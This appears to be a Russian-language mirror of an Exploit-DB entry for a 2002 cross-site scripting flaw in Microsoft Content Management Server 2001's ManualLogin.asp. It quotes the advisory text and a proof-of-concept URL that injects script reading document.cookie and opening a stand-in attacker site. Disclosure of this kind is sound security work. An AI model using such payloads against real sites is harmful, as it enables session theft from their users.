- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21920
- Проверка EDB
-
- Пройдено
- Автор
- OVERCLOCKING_A_LA_ABUELA
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2003-0002
- Дата публикации
- 2002-10-09
Код:
source: https://www.securityfocus.com/bid/5922/info
Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks.
An attacker could construct a malicious link to a vulnerable host that contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will be rendered in their browser, in the security context of the vulnerable site.
http://www.example.com/NR/System/Access/ManualLogin.asp?
REASONTXT=<script>alert(document.cookie);window.open
("http://attacker.site.example.com");</SCRIPT>- Источник
- www.exploit-db.com
